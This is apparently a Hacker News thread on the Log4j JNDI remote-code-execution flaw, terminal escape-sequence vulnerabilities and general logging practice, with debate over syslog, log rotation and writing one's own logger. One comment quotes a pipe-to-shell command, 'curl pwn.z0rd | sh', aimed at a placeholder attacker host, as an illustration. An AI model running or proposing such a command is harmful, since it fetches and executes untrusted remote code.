I did a lot when I younger and didn't realize that it was a bad practice.

arpa · on Dec 10, 2021

I've been on Linux since 2000s and still maintain the view that real men log in as root on tty1. It's ironman mode, and pure joy of *nix as it was meant to be experienced. You filthy casual. /s

dijit · on Dec 10, 2021

UNIX was designed as a multi-user system. So the joy of UNIX is using many users on one machine.

Which, incidentally, is the most pleasurable way of experiencing UNIX and UNIX-likes. (Shellboxen)

pid-1 · on Dec 10, 2021

I've seem root terminals a lot in CI pipelines in the wild.

Also one common way to install "DevOps" stuff piping scripts from curl (and them being asked for root)

phonethrowaway · on Dec 10, 2021

the point is it's a feature, not an exploit. control and escape codes are a thing for a reason.

it's worse with web stuff though... and it's a real vector.

https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=terminal+es...

https://packetstormsecurity.com/files/162518/AWS-CloudShell-...

https://nvd.nist.gov/vuln/detail/CVE-2017-0899

https://github.com/InfosecMatter/terminal-escape-injections

barkingcat · on Dec 11, 2021

I'd be wary of the assumption that mainstream terminals are well reviewed. I'd think terminal software are one of those less glamorous software that doesn't get any attention at all.

similarly to shells and base/foundational software (like logging libraries).

Bash itself goes for long spans of time without updates in their release versions https://git.savannah.gnu.org/cgit/bash.git

FDSGSG · on Dec 10, 2021

>Terminals are run as root all the time. I would guess any mainstream ones are well reviewed to not have such exploits work

This is a really ridiculous assumption.

barkingcat · on Dec 11, 2021

yah this is saying "I use this all the time so someone else must be making it safe to use!"

mirashii · on Dec 10, 2021

screen had a recent RCE of the sort. https://nvd.nist.gov/vuln/detail/CVE-2021-26937

jimrandomh · on Dec 10, 2021

Yes. Here's a recent one: https://nvd.nist.gov/vuln/detail/CVE-2021-27135

immibis · on Dec 10, 2021

There are terminal control codes (status reports) that cause the terminal to send characters. However it looks like the format won't be very useful for RCE. Some of the codes like the cursor position are controllable by sending other control codes first, but you can't set the cursor position to "curl pwn.z0rd | sh"

seanhunter · on Dec 10, 2021

Noone should be running a terminal as root if it can be avoided. Best practise would be to run the terminal as your user and sudo individual commands as needed. Assuming the command had untrusted output (eg `sudo tail -100F <some log with hostile info>`) the output would still be in your terminal. Any exploit would then need to be in "tail" (because that's the thing in this example you're running as root) or would need to be coupled with a priviledge escalation to get root.

This is the kind of vulnerability the GP was talking about here I think https://nvd.nist.gov/vuln/detail/CVE-2021-27135 and there have been a few in the history of terminals. If you've looked at the code for the historical terms (xterm, rxvt etc) it's very large and kinda gnarly. If you're security or performance-conscious there are probably better choices nowdays (eg Alacritty which I primarily use) which have a much smaller attack surface.

dystroy · on Dec 10, 2021

But you log strings, not bytes, meaning that the escape sequences are escaped, unless there's a severe bug in the logger.

400thecat · on Dec 12, 2021

can you show an example how that would work ?

testplzignore · on Dec 10, 2021

I don't get what the point of this feature even is. What is a legitimate reason for a logging library to make network requests based on the contents of what is being logged? And is this enabled out-of-the-box with log4j2?

BeefWellington · on Dec 10, 2021

> I don't get what the point of this feature even is.

This is basically the response to every type of vulnerability that is based on some spec nobody's read. Same deal with XML entity parsing. Why should it make web requests, FTP requests, etc.?

At some point someone had it as a requirement and everyone else gets to live with it.

throw_nbvc1234 · on Dec 10, 2021

Which is why they removed the functionality in the latest version (per comments below) right?

tmm1 · on Dec 10, 2021

Not removed: https://github.com/apache/logging-log4j2/commit/d82b47c6fae9...

Quekid5 · on Dec 10, 2021

Holy moley, that's a lot of extra code... any bets on if it might contain new vulnerabilities? :)

justinpombrio · on Dec 19, 2021

Hahaha, giving you an upvote because new vulnerabilities have, in fact, been found. (And I think one of them relates to this new code not being sufficient? Though I'm not following much anymore.)

scottlamb · on Dec 10, 2021

There are two bizarre design decisions that combined into this stunning security vulnerability: the automatic trust-the-world code execution (on by default) and the recursive parameter expansion (always on). They flipped the default on the former. They haven't done anything about the latter, AFAIK. I wonder if they will.

BinaryRage · on Dec 10, 2021

log4j2 supports lookups, which allows you to add additional logging context:

https://logging.apache.org/log4j/2.x/manual/lookups.html

The problem here is the JNDI lookup because for historical reasons there is code in these providers which causes Java to deserialize and load bytecode if it's found in a result for a lookup against an LDAP server. That exploit was partially fixed in the JDK in 2008, then in 2018, but there are multiple naming providers that are affected.

Yes, it's enabled by default before 2.15.0, released today to mitigate this issue.

shp0ngle · on Dec 10, 2021

I don’t understand these Java protocols enough to understand why was loading arbitrary bytecode from URLs even considered a feature, but I guess it was the 90s and Objects were all the rage

AtNightWeCode · on Dec 10, 2021

A lot of libs for logging have similar convenient ways for getting usernames and so on. The error here seems to be that even though you use the lib correctly a bug was introduced that made the injected parameters a part of the layout, at least that is what people are claiming. The example from the article though is an incorrect use of the lib and one can expect the same type of issues in a lot of libs when dealing with input parameters.

shp0ngle · on Dec 11, 2021

I understand that. I don’t understand JDNI, LDAP and why it ever downloads and runs remote bytecode and why was that ever considered a good feature.

toyg · on Dec 11, 2021

LDAP is typically a behind-the-firewall protocol. At that point, in the "old school" mindset, it's considered a trusted service. Having features to automatically pick up stuff across your own network of boxes might be considered useful by many an admin.

blincoln · on Dec 11, 2021

Also, my understanding is that Java deserialization (or deserialization in general) wasn't intended to explicitly allow actual code execution, just reconstitution of an object's state from storage on disk, the network, etc. Sometimes the state of certain types of object can be repurposed to result in arbitrary code execution, but AFAIK that wasn't an anticipated outcome or design goal back in the 90s.

nijave · on Dec 10, 2021

I'm guessing some sort of auditing or routing functionality. For instance, you have debug logs going to some development server and login events going to so audit server.

I don't have experience with this feature but there's similar use cases in log shipping utilities like fluentd

Edit: I read the other link and it looks like some sort of poorly designed RPC functionality or something shrug

Edit 2: Reading https://docs.oracle.com/javase/7/docs/technotes/guides/jndi/..., it sounds like it's a form of service discover of sorts. You talk to a registry server and it provides some object pointing to the real destination

shp0ngle · on Dec 10, 2021

Reading about this got me to the words “servlet” and “BeanFactory”, which I don’t really want to uncover right now, as it might open some pandora’s box

toyg · on Dec 11, 2021

Those are very famous '90s Java concepts (J2EE), and I feel old for talking to somebody who doesn't know what they are.

shp0ngle · on Dec 12, 2021

I remember reading about them when I learned programming in 2000s, but never used them in reality. Luckily.

est · on Dec 10, 2021

> What is a legitimate reason for a logging library to make network requests based on the contents of what is being logged

I encountered a similar problem recently, my own logger can get the current container/pod IP address, it's painful to tell which host from the IPs in logs, so I had to do a manual DNS lookup to include a hostname instead. I was hoping the logger could automatically do a lookup and cache it for me.

Too · on Dec 11, 2021

Pretty sure the original rationale for this clusterfuck must have been something similar: “we only have user id here, but want the logs to contain user name”. Send this requirement to the cheapest bidder and here we are.

suraci · on Dec 10, 2021

Why didn't write logs to stdout and scrape container log files by fluentbit/promtail/etc? I'm working on logging infrastructure now and really want to know the reason behind this(before I built it...)

est · on Dec 10, 2021

I do, but with a different log aggregator (vector.dev), there are three reasons:

1. the log aggregator doesn't exactly support DNS lookups

2. You have to parse the log first, exactly precisely where the IP part, then do a proper lookup. But sometimes the log is just a mess.

3. where the log aggregator located cannot do host lookup because of different network and different DNS server.

So overall the lookup would better be done locally.

numpad0 · on Dec 10, 2021

I think this hilarious surprise from "network is the computer" principle and "it just so happens to go through xyz" transparency is just awesome.

keyle · on Dec 10, 2021

So if you have a null pointer exception or something similar in production, you want to send that information to a remote host or alert system to be looked at urgently.

markburns · on Dec 10, 2021

I might be missing something, but wouldn't the point be that it's not the log writer's responsibility to do this, but rather some other service that consumes the unparsed output and sends the notification?

makeitdouble · on Dec 10, 2021

This is the obvious solution now.

I think 20 years ago it would have been slammed as overkill to have a separate process just to send logs.

Even now actually, there is a flurry of libs/gems to send events/logs/analytics to a remote server (Datadog, NewRelic, Slack…)from the application itself. It’s usually not directly coupled with the logger, but it’s not far.

Thorrez · on Dec 10, 2021

Putting a feature in a logger to send logs remote is one thing. Putting a special syntax into the log message itself that gets parsed to decide where to send it is much weirder.

tmd83 · on Dec 10, 2021

Exactly and this being enabled by default seems specially more unusual. I can understand config being parseable even though log configurer directly pulling a remote config is a stretch specially by default. But I don't think it's unlikely that people would by default assume that their log message would be parsed that way and as someone said it even works if that's used as a user input using {} instead of +.

spc476 · on Dec 10, 2021

syslog() has been around for a lot longer than 20 years, and that's a function that logs to a separate process. What's so bad about syslog that people need to invent new logging systems?

funcDropShadow · on Dec 10, 2021

Because it is not portable and therefore not the blessed Java entreprise way of doing things. /rantoff

abhishekjha · on Dec 11, 2021

Apps do send metrics from the process itself. Dropwizard metrics comes to mind. Wonder what timing RCE is waiting to happen there.

keyle · on Dec 10, 2021

Agreed. It's all nice to have. People want push.

You can eat your pizza slice whichever way you want.

Arguably this would be useful for critical events.

Merad · on Dec 10, 2021

Encoding that in the log message itself still seems a bit crazy. I’m not familiar with log4j, but the .Net logging libraries I do know (NLog and Serilog) completely separate writing log events from processing (writing, sending, whatever) the events.

ec109685 · on Dec 10, 2021

I believe the idea is that it lets you augment your log line with additional information to make it easier to read versus having to do the lookup at parse time.

neop1x · on Dec 11, 2021

I guess a full scripting language support in the log string should be the next big feature. Ideally with full FS and network access.

anonymousiam · on Dec 10, 2021

NSA TIA

jimrandomh · on Dec 10, 2021

I try to follow a rule with libraries: if a library causes more trouble than the implementation effort it would take to recreate its functionality from scratch (or rather, the portion of its funcitonality that is used in practice), then it's time to purge that library from projects and never use it again.

The part of log4j functionality that gets used in practice, most of the time, is just a wrapper around printf which adds a timestamp and a log-level. This is very quick and easy to write. A library in this role should have zero RCEs, ever in its entire lifetime, or it is unfit for purpose.

nostoc · on Dec 10, 2021

> just a wrapper around printf which adds a timestamp and a log-level

That's a pretty naive view of what's needed in an enterprise logging solution.

logging to files, separate logging, remote logging, log rotation, logging 3rd party code...

Of course if you're simply sending lines to the terminal in a simple program you don't need log4j.

But once you scale, you'd be spending 3 weeks implementing what you get for free in log4j.

oasisbob · on Dec 10, 2021

Log4j configuration isn't free either. Ask anyone who has ever been woken up by an asinine log rotation bug. (The tailer broke, or the rotation didn't happen... again, etc)

Playing application log janitor is miserable. Just ship the logs and be done with it.

rtpg · on Dec 10, 2021

I mean if you write log rotation code yourself you will still be woken up by it.

I agree that log configuration is a pain in the butt and oftentimes messy (especially when some third party lib includes a line to basically wipe your global config and everything gets wonky), but it's not like the heavy value adds are easy and bug-free to write!

nostoc · on Dec 12, 2021

I'll agree to this, but it's still a lot better than trying to implement it yourself.

oasisbob · on Dec 12, 2021

I agree, writing (and arguably configuring) robust logging libraries isn't much fun, and not easy to do yourself.

So, don't. Ship the logs as quickly and as simply to a system which is explicitly for log management.

The choice isn't between writing huge logging libraries or using log4j, it's whether you want an application to handle its own flat-file logging and rotation in the first place.

Java has always been obnoxiously complex to steer towards sane, basic, modern syslog, which I think is a shame.

cozzyd · on Dec 10, 2021

I thought you just rely on rsyslog or journald for this stuff...

ninkendo · on Dec 10, 2021

Right?

Logs are streams, not files. To a first approximation, you should just log to standard out, and let another system take care of sending your output to either a file (with rotation) or logstash, or syslog, or a whatever else is appropriate. To a second approximation (if you’re already using stdout for something else), the thing you’re logging to should still be a file descriptor, but not a file per se. (perhaps a local socket to a logging system like syslog.)

I don’t need everything on my system that logs, to invent its own log output directory, and implement its own log rotation. That’s how you get a mishmash of different places where logs end up living, and they become very difficult to collate or compare, etc.

christophilus · on Dec 10, 2021

You do. None of the logging libraries I’ve used in the past 5 years even have log rotation as a feature, from what I can tell.

vbezhenar · on Dec 10, 2021

IMO enterprise logging solution should write logs to file and rotate files. The rest should be done by a separate services like Loki or Logstash.

tetha · on Dec 10, 2021

Imo, the main point of a system like log4j or slf4j if the ability to have logging in your service up to the point of it being a massive performance impact - and keep it disabled.

For example, Hibernate has full query logging built in, but even if you filter locally with some logging demon, pushing 100 - 1k queries / second to stdout or a file is going to cripple performance.

With a logging framework like Log4J or SLF4J you can have this query logging, and you can enable it within 1 monitor run (usually 60s) at runtine and disable it 4-5 minutes later. This is very, very powerful in production.

dijit · on Dec 10, 2021

Arguably log rotation should be handled outside of the application with logrotate or filebeat.

coredog64 · on Dec 10, 2021

Please not filebeat. For a few months I had this recurring problem where an app was logging way too much stuff. Filebeat dutifully accepted it and then created ghost files as a buffer which then filled up the disk and crashed the app.

Depending on the velocity at which the log barf was being produced, we sometimes had a short window in which we could manually (!) log in via SSH (!) and restart filebeat to force it to close the open file handles at the cost of losing everything being buffered locally (!).

Nursie · on Dec 10, 2021

> Of course if you're simply sending lines to the terminal in a simple program you don't need log4j

That's the issue though isn't it, a lot of people don't need those features, just the prettifying and formatting, levels selectable by classpath and basic bits. log4j is great at these things and has become the standard for these things as much as anything else.

And with a lot of stuff being done by microservices, serverless functions etc, you have other pieces that pick up the logs and do all the smart processing. Especially 'at scale'.

So a capable but simple logging library is probably a good option. Perhaps log4j could split.

shepherdjerred · on Dec 10, 2021

I disagree strongly with this.

You're better off learning the de-facto libraries of your language. Your employer, or any production application you're going to work on is probably going to use one of these libraries.

I learned the most common Java libraries when writing personal projects -- Lombok, log4j, Guava, Gson, Jackson, Netty, etc.

I had a significantly gentler learning curve at my first job. We used these common libraries, so I had a very easy time when I had to edit log filtering or fix log rotations of our applications.

asddubs · on Dec 10, 2021

Seems like you're disagreeing on the basis of personal development rather than whether it makes sense for any given project. I think at that point it depends on whether you're primarily coding to learn or to make software

shepherdjerred · on Dec 10, 2021

By the same token why would you roll your own instead of using a tried and true library that any experienced Java developer already knows?

jallen_dot_dev · on Dec 10, 2021

> why would you roll your own instead of using a tried and true library

For one, the very reason we are all in this thread right now.

thebean11 · on Dec 10, 2021

Plenty of "roll your own x"s have critical security bugs too, they just don't make the front page of HN. Do you really think, in general, roll your own is safer?

jallen_dot_dev · on Dec 10, 2021

Not in general. Your own cryptography implementation? Hell no. Your own simple logging solution that doesn't need anything fancy from log4j? Probably.

thebean11 · on Dec 10, 2021

Simple is..a pretty big stretch for Log4j, even just taking the subset of features that your average medium-sized company would use.

teitoklien · on Dec 10, 2021

You’re practically right, But if your team isn't constantly changing then running your custom solution for at-least more simpler things like logging is better.

Because otherwise you have to depend on skills of a third party library maintainer you have no communication with or contract agreement with, to protect his/her codebase from getting security backdoors, which other malicious actors will constantly try to inject it with, if the library is known to be used by various large enterprises.

Coding with third party libraries is about trust, for simpler functions and packages its usually worth it long term to code it in-house. It’s easier to maintain, only comes with features you need and you’re always aware of what capabilities your code has.

I’m everyday impressed how relatively less npm with node, etc get hacked, considering they use additional third-party libraries for 4 liner functions too.

asddubs · on Dec 10, 2021

put in general terms, to minimize complexity, and to a lesser extent, increase control. I'm not saying it's always worth it to do that no matter what, but for smaller things like logging, if you don't have any hugely complex needs (i.e. it won't be much effort to maintain your own solution), I would personally always prefer an in-house solution. It's all a function of effort, of course.

staticassertion · on Dec 10, 2021

Because it apparently is absurdly complicated for a task I can solve with 'println'.

coredog64 · on Dec 10, 2021

Java since 5 has included it’s own logging class. It doesn’t have as many features as log4j, but it also doesn’t load classes via JNDI.